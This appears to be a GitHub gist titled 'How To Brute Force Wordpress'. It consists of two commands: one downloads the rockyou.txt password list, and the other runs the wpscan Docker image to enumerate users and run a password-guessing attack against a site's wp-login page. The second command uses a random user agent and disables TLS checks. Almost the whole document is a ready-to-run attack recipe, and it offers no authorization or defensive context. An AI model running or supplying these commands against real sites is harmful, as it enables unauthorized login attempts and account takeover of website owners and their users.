Skip to content

Instantly share code, notes, and snippets.

@random-robbie
Last active August 17, 2020 23:21
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save random-robbie/77892fd124ed325b1bdff9a9c700000d to your computer and use it in GitHub Desktop.
Save random-robbie/77892fd124ed325b1bdff9a9c700000d to your computer and use it in GitHub Desktop.

How To Brute Force Wordpress

wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
sudo docker run -v $(pwd):/wordlists/ -it --rm wpscanteam/wpscan --url https://website.com --rua -e u --users-detection mixed --password-attack wp-login -P /wordlists/rockyou.txt --disable-tls-checks
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment